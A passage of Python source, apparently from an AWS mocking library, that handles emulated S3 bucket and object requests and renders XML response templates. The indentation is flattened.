template = self.response_template(S3_BUCKET_CORS_RESPONSE)
return template.render(bucket=bucket)
elif 'versions' in querystring:
delimiter = querystring.get('delimiter', [None])[0]
encoding_type = querystring.get('encoding-type', [None])[0]
key_marker = querystring.get('key-marker', [None])[0]
max_keys = querystring.get('max-keys', [None])[0]
prefix = querystring.get('prefix', [''])[0]
version_id_marker = querystring.get('version-id-marker', [None])[0]
bucket = self.backend.get_bucket(bucket_name)
versions = self.backend.get_bucket_versions(
bucket_name,
delimiter=delimiter,
encoding_type=encoding_type,
key_marker=key_marker,
max_keys=max_keys,
version_id_marker=version_id_marker,
prefix=prefix
)
latest_versions = self.backend.get_bucket_latest_versions(
bucket_name=bucket_name
)
key_list = []
delete_marker_list = []
for version in versions:
if isinstance(version, FakeKey):
key_list.append(version)
else:
delete_marker_list.append(version)
template = self.response_template(S3_BUCKET_GET_VERSIONS)
return 200, {}, template.render(
key_list=key_list,
delete_marker_list=delete_marker_list,
latest_versions=latest_versions,
bucket=bucket,
prefix='',
max_keys=1000,
delimiter='',
is_truncated='false',
)
elif querystring.get('list-type', [None])[0] == '2':
return 200, {}, self._handle_list_objects_v2(bucket_name, querystring)
bucket = self.backend.get_bucket(bucket_name)
prefix = querystring.get('prefix', [None])[0]
if prefix and isinstance(prefix, six.binary_type):
prefix = prefix.decode("utf-8")
delimiter = querystring.get('delimiter', [None])[0]
result_keys, result_folders = self.backend.prefix_query(
bucket, prefix, delimiter)
template = self.response_template(S3_BUCKET_GET_RESPONSE)
return 200, {}, template.render(
bucket=bucket,
prefix=prefix,
delimiter=delimiter,
result_keys=result_keys,
result_folders=result_folders
)
def _handle_list_objects_v2(self, bucket_name, querystring):
template = self.response_template(S3_BUCKET_GET_RESPONSE_V2)
bucket = self.backend.get_bucket(bucket_name)
prefix = querystring.get('prefix', [None])[0]
if prefix and isinstance(prefix, six.binary_type):
prefix = prefix.decode("utf-8")
delimiter = querystring.get('delimiter', [None])[0]
result_keys, result_folders = self.backend.prefix_query(
bucket, prefix, delimiter)
fetch_owner = querystring.get('fetch-owner', [False])[0]
max_keys = int(querystring.get('max-keys', [1000])[0])
continuation_token = querystring.get('continuation-token', [None])[0]
start_after = querystring.get('start-after', [None])[0]
if continuation_token or start_after:
limit = continuation_token or start_after
continuation_index = 0
for key in result_keys:
if key.name > limit:
break
continuation_index += 1
result_keys = result_keys[continuation_index:]
if len(result_keys) > max_keys:
is_truncated = 'true'
result_keys = result_keys[:max_keys]
next_continuation_token = result_keys[-1].name
else:
is_truncated = 'false'
next_continuation_token = None
return template.render(
bucket=bucket,
prefix=prefix or '',
delimiter=delimiter,
result_keys=result_keys,
result_folders=result_folders,
fetch_owner=fetch_owner,
max_keys=max_keys,
is_truncated=is_truncated,
next_continuation_token=next_continuation_token,
start_after=None if continuation_token else start_after
)
def _bucket_response_put(self, request, body, region_name, bucket_name, querystring, headers):
if not request.headers.get('Content-Length'):
return 411, {}, "Content-Length required"
if 'versioning' in querystring:
ver = re.search('<Status>([A-Za-z]+)</Status>', body)
if ver:
self.backend.set_bucket_versioning(bucket_name, ver.group(1))
template = self.response_template(S3_BUCKET_VERSIONING)
return template.render(bucket_versioning_status=ver.group(1))
else:
return 404, {}, ""
elif 'lifecycle' in querystring:
rules = xmltodict.parse(body)['LifecycleConfiguration']['Rule']
if not isinstance(rules, list):
# If there is only one rule, xmldict returns just the item
rules = [rules]
self.backend.set_bucket_lifecycle(bucket_name, rules)
return ""
elif 'policy' in querystring:
self.backend.set_bucket_policy(bucket_name, body)
return 'True'
elif 'acl' in querystring:
acl = self._acl_from_headers(request.headers)
# TODO: Support the XML-based ACL format
self.backend.set_bucket_acl(bucket_name, acl)
return ""
elif "tagging" in querystring:
tagging = self._bucket_tagging_from_xml(body)
self.backend.put_bucket_tagging(bucket_name, tagging)
return ""
elif 'website' in querystring:
self.backend.set_bucket_website_configuration(bucket_name, body)
return ""
elif "cors" in querystring:
from moto.s3.exceptions import MalformedXML
try:
self.backend.put_bucket_cors(bucket_name, self._cors_from_xml(body))
return ""
except KeyError:
raise MalformedXML()
else:
if body:
try:
region_name = xmltodict.parse(body)['CreateBucketConfiguration']['LocationConstraint']
except KeyError:
pass
try:
new_bucket = self.backend.create_bucket(
bucket_name, region_name)
except BucketAlreadyExists:
if region_name == DEFAULT_REGION_NAME:
# us-east-1 has different behavior
new_bucket = self.backend.get_bucket(bucket_name)
else:
raise
template = self.response_template(S3_BUCKET_CREATE_RESPONSE)
return 200, {}, template.render(bucket=new_bucket)
def _bucket_response_delete(self, body, bucket_name, querystring, headers):
if 'policy' in querystring:
self.backend.delete_bucket_policy(bucket_name, body)
return 204, {}, ""
elif "tagging" in querystring:
self.backend.delete_bucket_tagging(bucket_name)
return 204, {}, ""
elif "cors" in querystring:
self.backend.delete_bucket_cors(bucket_name)
return 204, {}, ""
elif 'lifecycle' in querystring:
bucket = self.backend.get_bucket(bucket_name)
bucket.delete_lifecycle()
return 204, {}, ""
removed_bucket = self.backend.delete_bucket(bucket_name)
if removed_bucket:
# Bucket exists
template = self.response_template(S3_DELETE_BUCKET_SUCCESS)
return 204, {}, template.render(bucket=removed_bucket)
else:
# Tried to delete a bucket that still has keys
template = self.response_template(
S3_DELETE_BUCKET_WITH_ITEMS_ERROR)
return 409, {}, template.render(bucket=removed_bucket)
def _bucket_response_post(self, request, body, bucket_name, headers):
if not request.headers.get('Content-Length'):
return 411, {}, "Content-Length required"
path = request.path if hasattr(request, 'path') else request.path_url
if self.is_delete_keys(request, path, bucket_name):
return self._bucket_response_delete_keys(request, body, bucket_name, headers)
# POST to bucket-url should create file from form
if hasattr(request, 'form'):
# Not HTTPretty
form = request.form
else:
# HTTPretty, build new form object
form = {}
for kv in body.split('&'):
k, v = kv.split('=')
form[k] = v
key = form['key']
if 'file' in form:
f = form['file']
else:
f = request.files['file'].stream.read()
new_key = self.backend.set_key(bucket_name, key, f)
# Metadata
metadata = metadata_from_headers(form)
new_key.set_metadata(metadata)
return 200, {}, ""
def _bucket_response_delete_keys(self, request, body, bucket_name, headers):
template = self.response_template(S3_DELETE_KEYS_RESPONSE)
keys = minidom.parseString(body).getElementsByTagName('Key')
deleted_names = []
error_names = []
for k in keys:
key_name = k.firstChild.nodeValue
success = self.backend.delete_key(bucket_name, key_name)
if success:
deleted_names.append(key_name)
else:
error_names.append(key_name)
return 200, {}, template.render(deleted=deleted_names, delete_errors=error_names)
def _handle_range_header(self, request, headers, response_content):
response_headers = {}
length = len(response_content)
last = length - 1
_, rspec = request.headers.get('range').split('=')
if ',' in rspec:
raise NotImplementedError(
"Multiple range specifiers not supported")
def toint(i):
return int(i) if i else None
begin, end = map(toint, rspec.split('-'))
if begin is not None: # byte range
end = last if end is None else min(end, last)
elif end is not None: # suffix byte range
begin = length - min(end, length)
end = last
else:
return 400, response_headers, ""
if begin < 0 or end > last or begin > min(end, last):
return 416, response_headers, ""
response_headers['content-range'] = "bytes {0}-{1}/{2}".format(
begin, end, length)
return 206, response_headers, response_content[begin:end + 1]
def key_response(self, request, full_url, headers):
response_headers = {}
try:
response = self._key_response(request, full_url, headers)
except S3ClientError as s3error:
response = s3error.code, {}, s3error.description
if isinstance(response, six.string_types):
status_code = 200
response_content = response
else:
status_code, response_headers, response_content = response
if status_code == 200 and 'range' in request.headers:
return self._handle_range_header(request, response_headers, response_content)
return status_code, response_headers, response_content
def _key_response(self, request, full_url, headers):
parsed_url = urlparse(full_url)
query = parse_qs(parsed_url.query, keep_blank_values=True)
method = request.method
key_name = self.parse_key_name(request, parsed_url.path)
bucket_name = self.parse_bucket_name_from_url(request, full_url)
if hasattr(request, 'body'):
# Boto
body = request.body
if hasattr(body, 'read'):
body = body.read()
else:
# Flask server
body = request.data
if body is None:
body = b''
if method == 'GET':
return self._key_response_get(bucket_name, query, key_name, headers)
elif method == 'PUT':
return self._key_response_put(request, body, bucket_name, query, key_name, headers)
elif method == 'HEAD':
return self._key_response_head(bucket_name, query, key_name, headers=request.headers)
elif method == 'DELETE':
return self._key_response_delete(bucket_name, query, key_name, headers)
elif method == 'POST':
return self._key_response_post(request, body, bucket_name, query, key_name, headers)
else:
raise NotImplementedError(
"Method {0} has not been implemented in the S3 backend yet".format(method))
def _key_response_get(self, bucket_name, query, key_name, headers):
response_headers = {}
if query.get('uploadId'):
upload_id = query['uploadId'][0]
parts = self.backend.list_multipart(bucket_name, upload_id)
template = self.response_template(S3_MULTIPART_LIST_RESPONSE)
return 200, response_headers, template.render(
bucket_name=bucket_name,
key_name=key_name,
upload_id=upload_id,
count=len(parts),
parts=parts
)
version_id = query.get('versionId', [None])[0]
key = self.backend.get_key(
bucket_name, key_name, version_id=version_id)
if key is None:
raise MissingKey(key_name)
if 'acl' in query:
template = self.response_template(S3_OBJECT_ACL_RESPONSE)
return 200, response_headers, template.render(obj=key)
if 'tagging' in query:
template = self.response_template(S3_OBJECT_TAGGING_RESPONSE)
return 200, response_headers, template.render(obj=key)
response_headers.update(key.metadata)
response_headers.update(key.response_dict)
return 200, response_headers, key.value
def _key_response_put(self, request, body, bucket_name, query, key_name, headers):
response_headers = {}
if query.get('uploadId') and query.get('partNumber'):
upload_id = query['uploadId'][0]
part_number = int(query['partNumber'][0])
if 'x-amz-copy-source' in request.headers:
src = request.headers.get("x-amz-copy-source").lstrip("/")
src_bucket, src_key = src.split("/", 1)
src_range = request.headers.get(
'x-amz-copy-source-range', '').split("bytes=")[-1]
try:
start_byte, end_byte = src_range.split("-")
start_byte, end_byte = int(start_byte), int(end_byte)
except ValueError:
start_byte, end_byte = None, None
key = self.backend.copy_part(
bucket_name, upload_id, part_number, src_bucket,
src_key, start_byte, end_byte)
template = self.response_template(S3_MULTIPART_UPLOAD_RESPONSE)
response = template.render(part=key)
else:
key = self.backend.set_part(
bucket_name, upload_id, part_number, body)
response = ""
response_headers.update(key.response_dict)
return 200, response_headers, response
storage_class = request.headers.get('x-amz-storage-class', 'STANDARD')
acl = self._acl_from_headers(request.headers)
tagging = self._tagging_from_headers(request.headers)
if 'acl' in query:
key = self.backend.get_key(bucket_name, key_name)
# TODO: Support the XML-based ACL format
key.set_acl(acl)
return 200, response_headers, ""
if 'tagging' in query:
tagging = self._tagging_from_xml(body)
self.backend.set_key_tagging(bucket_name, key_name, tagging)
return 200, response_headers, ""
if 'x-amz-copy-source' in request.headers:
# Copy key
src_key_parsed = urlparse(request.headers.get("x-amz-copy-source"))
src_bucket, src_key = src_key_parsed.path.lstrip("/").split("/", 1)
src_version_id = parse_qs(src_key_parsed.query).get(
'versionId', [None])[0]
self.backend.copy_key(src_bucket, src_key, bucket_name, key_name,
storage=storage_class, acl=acl, src_version_id=src_version_id)
new_key = self.backend.get_key(bucket_name, key_name)
mdirective = request.headers.get('x-amz-metadata-directive')
if mdirective is not None and mdirective == 'REPLACE':
metadata = metadata_from_headers(request.headers)
new_key.set_metadata(metadata, replace=True)
template = self.response_template(S3_OBJECT_COPY_RESPONSE)
response_headers.update(new_key.response_dict)
return 200, response_headers, template.render(key=new_key)
streaming_request = hasattr(request, 'streaming') and request.streaming
closing_connection = headers.get('connection') == 'close'
if closing_connection and streaming_request:
# Closing the connection of a streaming request. No more data
new_key = self.backend.get_key(bucket_name, key_name)
elif streaming_request:
# Streaming request, more data
new_key = self.backend.append_to_key(bucket_name, key_name, body)
else:
# Initial data
new_key = self.backend.set_key(bucket_name, key_name, body,
storage=storage_class)
request.streaming = True
metadata = metadata_from_headers(request.headers)
new_key.set_metadata(metadata)
new_key.set_acl(acl)
new_key.website_redirect_location = request.headers.get('x-amz-website-redirect-location')
new_key.set_tagging(tagging)
template = self.response_template(S3_OBJECT_RESPONSE)
response_headers.update(new_key.response_dict)
return 200, response_headers, template.render(key=new_key)
def _key_response_head(self, bucket_name, query, key_name, headers):
response_headers = {}
version_id = query.get('versionId', [None])[0]
if_modified_since = headers.get('If-Modified-Since', None)
if if_modified_since:
if_modified_since = str_to_rfc_1123_datetime(if_modified_since)
key = self.backend.get_key(
bucket_name, key_name, version_id=version_id)
if key:
response_headers.update(key.metadata)
response_headers.update(key.response_dict)
if if_modified_since and key.last_modified < if_modified_since:
return 304, response_headers, 'Not Modified'
else:
return 200, response_headers, ""
else:
return 404, response_headers, ""
def _acl_from_headers(self, headers):
canned_acl = headers.get('x-amz-acl', '')
if canned_acl:
return get_canned_acl(canned_acl)
grants = []
for header, value in headers.items():
if not header.startswith('x-amz-grant-'):
continue
permission = {
'read': 'READ',
'write': 'WRITE',
'read-acp': 'READ_ACP',
'write-acp': 'WRITE_ACP',
'full-control': 'FULL_CONTROL',
}[header[len('x-amz-grant-'):]]
grantees = []
for key_and_value in value.split(","):
key, value = re.match(
'([^=]+)="([^"]+)"', key_and_value.strip()).groups()
if key.lower() == 'id':
grantees.append(FakeGrantee(id=value))
else:
grantees.append(FakeGrantee(uri=value))
grants.append(FakeGrant(grantees, [permission]))
if grants:
return FakeAcl(grants)
else:
return None
def _tagging_from_headers(self, headers):
if headers.get('x-amz-tagging'):
parsed_header = parse_qs(headers['x-amz-tagging'], keep_blank_values=True)
tags = []
for tag in parsed_header.items():
tags.append(FakeTag(tag[0], tag[1][0]))
tag_set = FakeTagSet(tags)
tagging = FakeTagging(tag_set)
return tagging
else:
return FakeTagging()
def _tagging_from_xml(self, xml):
parsed_xml = xmltodict.parse(xml)
tags = []
for tag in parsed_xml['Tagging']['TagSet']['Tag']:
tags.append(FakeTag(tag['Key'], tag['Value']))
tag_set = FakeTagSet(tags)
tagging = FakeTagging(tag_set)
return tagging
def _bucket_tagging_from_xml(self, xml):
parsed_xml = xmltodict.parse(xml)
tags = []
# Optional if no tags are being sent:
if parsed_xml['Tagging'].get('TagSet'):
for tag in parsed_xml['Tagging']['TagSet']['Tag']:
tags.append(FakeTag(tag['Key'], tag['Value']))
tag_set = FakeTagSet(tags)
tagging = FakeTagging(tag_set)
return tagging
def _cors_from_xml(self, xml):
parsed_xml = xmltodict.parse(xml)
if isinstance(parsed_xml["CORSConfiguration"]["CORSRule"], list):
return [cors for cors in parsed_xml["CORSConfiguration"]["CORSRule"]]
return [parsed_xml["CORSConfiguration"]["CORSRule"]]
def _key_response_delete(self, bucket_name, query, key_name, headers):
if query.get('uploadId'):
upload_id = query['uploadId'][0]
self.backend.cancel_multipart(bucket_name, upload_id)
return 204, {}, ""
version_id = query.get('versionId', [None])[0]
self.backend.delete_key(bucket_name, key_name, version_id=version_id)
template = self.response_template(S3_DELETE_OBJECT_SUCCESS)
return 204, {}, template.render()
def _complete_multipart_body(self, body):
ps = minidom.parseString(body).getElementsByTagName('Part')
prev = 0
for p in ps:
pn = int(p.getElementsByTagName(
'PartNumber')[0].firstChild.wholeText)
if pn <= prev:
raise InvalidPartOrder()
yield (pn, p.getElementsByTagName('ETag')[0].firstChild.wholeText)
def _key_response_post(self, request, body, bucket_name, query, key_name, headers):
if body == b'' and 'uploads' in query:
metadata = metadata_from_headers(request.headers)
multipart = self.backend.initiate_multipart(
bucket_name, key_name, metadata)
template = self.response_template(S3_MULTIPART_INITIATE_RESPONSE)
response = template.render(
bucket_name=bucket_name,
key_name=key_name,
upload_id=multipart.id,
)
return 200, {}, response
if query.get('uploadId'):
body = self._complete_multipart_body(body)
upload_id = query['uploadId'][0]
key = self.backend.complete_multipart(bucket_name, upload_id, body)
template = self.response_template(S3_MULTIPART_COMPLETE_RESPONSE)
return template.render(
bucket_name=bucket_name,
key_name=key.name,
etag=key.etag,
)
elif 'restore' in query:
es = minidom.parseString(body).getElementsByTagName('Days')
days = es[0].childNodes[0].wholeText
key = self.backend.get_key(bucket_name, key_name)
r = 202
if key.expiry_date is not None:
r = 200
key.restore(int(days))
return r, {}, ""
else:
raise NotImplementedError(
"Method POST had only been implemented for multipart uploads and restore operations, so far")
S3ResponseInstance = ResponseObject(s3_backend)
S3_ALL_BUCKETS = """<ListAllMyBucketsResult xmlns="http://s3.amazonaws.com/doc/2006-03-01">
<Owner>
<ID>bcaf1ffd86f41161ca5fb16fd081034f</ID>
<DisplayName>webfile</DisplayName>
</Owner>
<Buckets>
{% for bucket in buckets %}
<Bucket>
<Name>{{ bucket.name }}</Name>
<CreationDate>2006-02-03T16:45:09.000Z</CreationDate>
</Bucket>
{% endfor %}
</Buckets>
</ListAllMyBucketsResult>"""
S3_BUCKET_GET_RESPONSE = """<?xml version="1.0" encoding="UTF-8"?>
<ListBucketResult xmlns="http://s3.amazonaws.com/doc/2006-03-01/">
<Name>{{ bucket.name }}</Name>
<Prefix>{{ prefix }}</Prefix>
<MaxKeys>1000</MaxKeys>
<Delimiter>{{ delimiter }}</Delimiter>
<IsTruncated>false</IsTruncated>
{% for key in result_keys %}
<Contents>
<Key>{{ key.name }}</Key>
<LastModified>{{ key.last_modified_ISO8601 }}</LastModified>
<ETag>{{ key.etag }}</ETag>
<Size>{{ key.size }}</Size>
<StorageClass>{{ key.storage_class }}</StorageClass>
<Owner>
<ID>75aa57f09aa0c8caeab4f8c24e99d10f8e7faeebf76c078efc7c6caea54ba06a</ID>
<DisplayName>webfile</DisplayName>
</Owner>
</Contents>
{% endfor %}
{% if delimiter %}
{% for folder in result_folders %}
<CommonPrefixes>
<Prefix>{{ folder }}</Prefix>
</CommonPrefixes>
{% endfor %}
{% endif %}
</ListBucketResult>"""
S3_BUCKET_GET_RESPONSE_V2 = """<?xml version="1.0" encoding="UTF-8"?>
<ListBucketResult xmlns="http://s3.amazonaws.com/doc/2006-03-01/">
<Name>{{ bucket.name }}</Name>
<Prefix>{{ prefix }}</Prefix>
<MaxKeys>{{ max_keys }}</MaxKeys>
<KeyCount>{{ result_keys | length }}</KeyCount>
{% if delimiter %}
<Delimiter>{{ delimiter }}</Delimiter>
{% endif %}
<IsTruncated>{{ is_truncated }}</IsTruncated>
{% if next_continuation_token %}
<NextContinuationToken>{{ next_continuation_token }}</NextContinuationToken>
{% endif %}
{% if start_after %}
<StartAfter>{{ start_after }}</StartAfter>
{% endif %}
{% for key in result_keys %}
<Contents>
<Key>{{ key.name }}</Key>
<LastModified>{{ key.last_modified_ISO8601 }}</LastModified>
<ETag>{{ key.etag }}</ETag>
<Size>{{ key.size }}</Size>
<StorageClass>{{ key.storage_class }}</StorageClass>
{% if fetch_owner %}
<Owner>
<ID>75aa57f09aa0c8caeab4f8c24e99d10f8e7faeebf76c078efc7c6caea54ba06a</ID>
<DisplayName>webfile</DisplayName>
</Owner>
{% endif %}
</Contents>
{% endfor %}
{% if delimiter %}
{% for folder in result_folders %}
<CommonPrefixes>
<Prefix>{{ folder }}</Prefix>
</CommonPrefixes>
{% endfor %}
{% endif %}
</ListBucketResult>"""
S3_BUCKET_CREATE_RESPONSE = """<CreateBucketResponse xmlns="http://s3.amazonaws.com/doc/2006-03-01">
<CreateBucketResponse>
<Bucket>{{ bucket.name }}</Bucket>
</CreateBucketResponse>
</CreateBucketResponse>"""
S3_DELETE_BUCKET_SUCCESS = """<DeleteBucketResponse xmlns="http://s3.amazonaws.com/doc/2006-03-01">
<DeleteBucketResponse>
<Code>204</Code>
<Description>No Content</Description>
</DeleteBucketResponse>
</DeleteBucketResponse>"""
S3_DELETE_BUCKET_WITH_ITEMS_ERROR = """<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>BucketNotEmpty</Code>
<Message>The bucket you tried to delete is not empty</Message>
<BucketName>{{ bucket.name }}</BucketName>
<RequestId>asdfasdfsdafds</RequestId>
<HostId>sdfgdsfgdsfgdfsdsfgdfs</HostId>
</Error>"""
S3_BUCKET_LOCATION = """<?xml version="1.0" encoding="UTF-8"?>
<LocationConstraint xmlns="http://s3.amazonaws.com/doc/2006-03-01/">{{ location }}</LocationConstraint>"""
S3_BUCKET_LIFECYCLE_CONFIGURATION = """<?xml version="1.0" encoding="UTF-8"?>
<LifecycleConfiguration xmlns="http://s3.amazonaws.com/doc/2006-03-01/">
{% for rule in rules %}
<Rule>
<ID>{{ rule.id }}</ID>
<Prefix>{{ rule.prefix if rule.prefix != None }}</Prefix>
<Status>{{ rule.status }}</Status>
{% if rule.storage_class %}
<Transition>
{% if rule.transition_days %}
<Days>{{ rule.transition_days }}</Days>
{% endif %}
{% if rule.transition_date %}
<Date>{{ rule.transition_date }}</Date>
{% endif %}
<StorageClass>{{ rule.storage_class }}</StorageClass>
</Transition>
{% endif %}
{% if rule.expiration_days or rule.expiration_date %}
<Expiration>
{% if rule.expiration_days %}
<Days>{{ rule.expiration_days }}</Days>
{% endif %}
{% if rule.expiration_date %}
<Date>{{ rule.expiration_date }}</Date>
{% endif %}
</Expiration>
{% endif %}
</Rule>
{% endfor %}
</LifecycleConfiguration>
"""
S3_BUCKET_VERSIONING = """<?xml version="1.0" encoding="UTF-8"?>
<VersioningConfiguration xmlns="http://s3.amazonaws.com/doc/2006-03-01/">
<Status>{{ bucket_versioning_status }}</Status>
</VersioningConfiguration>
"""
S3_BUCKET_GET_VERSIONING = """<?xml version="1.0" encoding="UTF-8"?>
{% if status is none %}
<VersioningConfiguration xmlns="http://s3.amazonaws.com/doc/2006-03-01/"/>
{% else %}
<VersioningConfiguration xmlns="http://s3.amazonaws.com/doc/2006-03-01/">
<Status>{{ status }}</Status>
</VersioningConfiguration>
{% endif %}
"""
S3_BUCKET_GET_VERSIONS = """<?xml version="1.0" encoding="UTF-8"?>
<ListVersionsResult xmlns="http://s3.amazonaws.com/doc/2006-03-01">
<Name>{{ bucket.name }}</Name>
<Prefix>{{ prefix }}</Prefix>
<KeyMarker>{{ key_marker }}</KeyMarker>
<MaxKeys>{{ max_keys }}</MaxKeys>
<IsTruncated>{{ is_truncated }}</IsTruncated>
{% for key in key_list %}
<Version>
<Key>{{ key.name }}</Key>
<VersionId>{{ key.version_id }}</VersionId>
<IsLatest>{% if latest_versions[key.name] == key.version_id %}true{% else %}false{% endif %}</IsLatest>
<LastModified>{{ key.last_modified_ISO8601 }}</LastModified>
<ETag>{{ key.etag }}</ETag>
<Size>{{ key.size }}</Size>
<StorageClass>{{ key.storage_class }}</StorageClass>
<Owner>
<ID>75aa57f09aa0c8caeab4f8c24e99d10f8e7faeebf76c078efc7c6caea54ba06a</ID>
<DisplayName>webfile</DisplayName>
</Owner>
</Version>
{% endfor %}
{% for marker in delete_marker_list %}
<DeleteMarker>
<Key>{{ marker.key.name }}</Key>
<VersionId>{{ marker.version_id }}</VersionId>
<IsLatest>{% if latest_versions[marker.key.name] == marker.version_id %}true{% else %}false{% endif %}</IsLatest>
<LastModified>{{ marker.key.last_modified_ISO8601 }}</LastModified>
<Owner>
<ID>75aa57f09aa0c8caeab4f8c24e99d10f8e7faeebf76c078efc7c6caea54ba06a</ID>
<DisplayName>webfile</DisplayName>
</Owner>
</DeleteMarker>
{% endfor %}
</ListVersionsResult>
"""
S3_DELETE_KEYS_RESPONSE = """<?xml version="1.0" encoding="UTF-8"?>
<DeleteResult xmlns="http://s3.amazonaws.com/doc/2006-03-01">
{% for k in deleted %}
<Deleted>
<Key>{{k}}</Key>
</Deleted>
{% endfor %}
{% for k in delete_errors %}
<Error>
<Key>{{k}}</Key>
</Error>
{% endfor %}
</DeleteResult>"""
S3_DELETE_OBJECT_SUCCESS = """<DeleteObjectResponse xmlns="http://s3.amazonaws.com/doc/2006-03-01">
<DeleteObjectResponse>
<Code>200</Code>
<Description>OK</Description>
</DeleteObjectResponse>
</DeleteObjectResponse>"""
S3_OBJECT_RESPONSE = """<PutObjectResponse xmlns="http://s3.amazonaws.com/doc/2006-03-01">
<PutObjectResponse>
<ETag>{{ key.etag }}</ETag>
<LastModified>{{ key.last_modified_ISO8601 }}</LastModified>
</PutObjectResponse>
</PutObjectResponse>"""
S3_OBJECT_ACL_RESPONSE = """<?xml version="1.0" encoding="UTF-8"?>
<AccessControlPolicy xmlns="http://s3.amazonaws.com/doc/2006-03-01/">
<Owner>
<ID>75aa57f09aa0c8caeab4f8c24e99d10f8e7faeebf76c078efc7c6caea54ba06a</ID>
<DisplayName>webfile</DisplayName>
</Owner>
<AccessControlList>
{% for grant in obj.acl.grants %}
<Grant>
{% for grantee in grant.grantees %}
<Grantee xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:type="{{ grantee.type }}">
{% if grantee.uri %}
<URI>{{ grantee.uri }}</URI>
{% endif %}
{% if grantee.id %}
<ID>{{ grantee.id }}</ID>
{% endif %}
{% if grantee.display_name %}
<DisplayName>{{ grantee.display_name }}</DisplayName>
{% endif %}
</Grantee>
{% endfor %}
{% for permission in grant.permissions %}
<Permission>{{ permission }}</Permission>
{% endfor %}
</Grant>
{% endfor %}
</AccessControlList>
</AccessControlPolicy>"""
S3_OBJECT_TAGGING_RESPONSE = """\
<?xml version="1.0" encoding="UTF-8"?>
<Tagging xmlns="http://s3.amazonaws.com/doc/2006-03-01/">
<TagSet>
{% for tag in obj.tagging.tag_set.tags %}
<Tag>
<Key>{{ tag.key }}</Key>
<Value>{{ tag.value }}</Value>
</Tag>
{% endfor %}
</TagSet>
</Tagging>"""
S3_BUCKET_TAGGING_RESPONSE = """<?xml version="1.0" encoding="UTF-8"?>
<Tagging>
<TagSet>
{% for tag in bucket.tagging.tag_set.tags %}
<Tag>
<Key>{{ tag.key }}</Key>
<Value>{{ tag.value }}</Value>
</Tag>
{% endfor %}
</TagSet>
</Tagging>"""
S3_BUCKET_CORS_RESPONSE = """<?xml version="1.0" encoding="UTF-8"?>
<CORSConfiguration>
{% for cors in bucket.cors %}
<CORSRule>
{% for origin in cors.allowed_origins %}
<AllowedOrigin>{{ origin }}</AllowedOrigin>
{% endfor %}
{% for method in cors.allowed_methods %}
<AllowedMethod>{{ method }}</AllowedMethod>
{% endfor %}
{% if cors.allowed_headers is not none %}
{% for header in cors.allowed_headers %}
<AllowedHeader>{{ header }}</AllowedHeader>
{% endfor %}
{% endif %}
{% if cors.exposed_headers is not none %}
{% for header in cors.exposed_headers %}
<ExposedHeader>{{ header }}</ExposedHeader>
{% endfor %}
{% endif %}
{% if cors.max_age_seconds is not none %}
<MaxAgeSeconds>{{ cors.max_age_seconds }}</MaxAgeSeconds>
{% endif %}
</CORSRule>
{% endfor %}
</CORSConfiguration>
"""
S3_OBJECT_COPY_RESPONSE = """\
<CopyObjectResult xmlns="http://doc.s3.amazonaws.com/2006-03-01">
<ETag>{{ key.etag }}</ETag>
<LastModified>{{ key.last_modified_ISO8601 }}</LastModified>
</CopyObjectResult>"""
S3_MULTIPART_INITIATE_RESPONSE = """<?xml version="1.0" encoding="UTF-8"?>
<InitiateMultipartUploadResult xmlns="http://s3.amazonaws.com/doc/2006-03-01/">
<Bucket>{{ bucket_name }}</Bucket>
<Key>{{ key_name }}</Key>
<UploadId>{{ upload_id }}</UploadId>
</InitiateMultipartUploadResult>"""
S3_MULTIPART_UPLOAD_RESPONSE = """<?xml version="1.0" encoding="UTF-8"?>
<CopyPartResult xmlns="http://s3.amazonaws.com/doc/2006-03-01/">
<LastModified>{{ part.last_modified_ISO8601 }}</LastModified>
<ETag>{{ part.etag }}</ETag>
</CopyPartResult>"""
S3_MULTIPART_LIST_RESPONSE = """<?xml version="1.0" encoding="UTF-8"?>
<ListPartsResult xmlns="http://s3.amazonaws.com/doc/2006-03-01/">
<Bucket>{{ bucket_name }}</Bucket>
<Key>{{ key_name }}</Key>
<UploadId>{{ upload_id }}</UploadId>
<StorageClass>STANDARD</StorageClass>
<Initiator>
<ID>75aa57f09aa0c8caeab4f8c24e99d10f8e7faeebf76c078efc7c6caea54ba06a</ID>
<DisplayName>webfile</DisplayName>
</Initiator>
<Owner>
<ID>75aa57f09aa0c8caeab4f8c24e99d10f8e7faeebf76c078efc7c6caea54ba06a</ID>
<DisplayName>webfile</DisplayName>
</Owner>
<StorageClass>STANDARD</StorageClass>
<PartNumberMarker>1</PartNumberMarker>
<NextPartNumberMarker>{{ count }} </NextPartNumberMarker>
<MaxParts>{{ count }}</MaxParts>
<IsTruncated>false</IsTruncated>
{% for part in parts %}
<Part>
<PartNumber>{{ part.name }}</PartNumber>
<LastModified>{{ part.last_modified_ISO8601 }}</LastModified>
<ETag>{{ part.etag }}</ETag>
<Size>{{ part.size }}</Size>
</Part>
{% endfor %}
</ListPartsResult>"""
S3_MULTIPART_COMPLETE_RESPONSE = """<?xml version="1.0" encoding="UTF-8"?>
<CompleteMultipartUploadResult xmlns="http://s3.amazonaws.com/doc/2006-03-01/">
<Location>http://{{ bucket_name }}.s3.amazonaws.com/{{ key_name }}</Location>
<Bucket>{{ bucket_name }}</Bucket>
<Key>{{ key_name }}</Key>
<ETag>{{ etag }}</ETag>
</CompleteMultipartUploadResult>
"""
S3_ALL_MULTIPARTS = """<?xml version="1.0" encoding="UTF-8"?>
<ListMultipartUploadsResult xmlns="http://s3.amazonaws.com/doc/2006-03-01/">
<Bucket>{{ bucket_name }}</Bucket>
<KeyMarker></KeyMarker>
<UploadIdMarker></UploadIdMarker>
<MaxUploads>1000</MaxUploads>
<IsTruncated>False</IsTruncated>
{% for upload in uploads %}
<Upload>
<Key>{{ upload.key_name }}</Key>
<UploadId>{{ upload.id }}</UploadId>
<Initiator>
<ID>arn:aws:iam::123456789012:user/user1-11111a31-17b5-4fb7-9df5-b111111f13de</ID>
<DisplayName>user1-11111a31-17b5-4fb7-9df5-b111111f13de</DisplayName>
</Initiator>
<Owner>
<ID>75aa57f09aa0c8caeab4f8c24e99d10f8e7faeebf76c078efc7c6caea54ba06a</ID>
<DisplayName>webfile</DisplayName>
</Owner>
<StorageClass>STANDARD</StorageClass>
<Initiated>2010-11-10T20:48:33.000Z</Initiated>
</Upload>
{% endfor %}
</ListMultipartUploadsResult>
"""
S3_NO_POLICY = """<?xml version="1.0" encoding="UTF-8"?>
<Error>
<Code>NoSuchBucketPolicy</Code>
<Message>The bucket policy does not exist</Message>
